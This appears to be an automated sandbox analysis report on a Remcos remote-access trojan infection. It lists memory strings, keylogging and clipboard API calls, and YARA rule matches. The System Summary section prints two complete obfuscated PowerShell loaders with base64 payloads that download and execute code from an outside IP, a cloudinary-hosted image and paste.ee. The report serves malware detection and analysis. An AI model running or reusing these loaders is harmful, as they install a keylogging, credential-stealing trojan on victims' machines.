                    Source: CasPol.exe, 0000000C.00000002.4133634036.0000000000F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 00000003.00000002.1795643375.000000000587B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: bhvC939.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2025398722.00000000046D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: CasPol.exe, CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: CasPol.exe, CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                    Source: CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: powershell.exe, 00000003.00000002.1800035532.0000000007E91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                    Source: powershell.exe, 00000003.00000002.1800035532.0000000007E91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.h
                    Source: CasPol.exe, 0000000D.00000002.2090602025.00000000012F4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                    Source: CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2025398722.00000000046D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                    Source: powershell.exe, 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000006280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dahall/taskscheduler
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000003.00000002.1800035532.0000000007E4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: CasPol.exe, 0000000D.00000002.2093750805.000000000149E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: CasPol.exe, 0000000D.00000002.2093750805.000000000149E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: CasPol.exe, 0000000D.00000002.2095682237.0000000001759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
                    Source: CasPol.exe, 0000000D.00000002.2093750805.000000000149E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: CasPol.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: powershell.exe, 00000003.00000002.1795643375.000000000587B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgt
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, CasPol.exe, 0000000F.00000002.2081771578.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: CasPol.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                    Source: powershell.exe, 00000007.00000002.2025398722.0000000004940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownHTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.4:49738 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000012_2_004099E4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040987A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004098E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_00406DFC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_00406E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004068B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_004072B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_00409B10
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6772, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6772, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BB81 SystemParametersInfoW,12_2_0041BB81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BB87 SystemParametersInfoW,12_2_0041BB87

                    System Summary

                    barindex
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthineJump to behavior
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 7.2.powershell.exe.6646180.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 7.2.powershell.exe.6646180.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000007.00000002.2025398722.00000000065A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000007.00000002.2025398722.000000000573C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: CasPol.exe PID: 6772, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
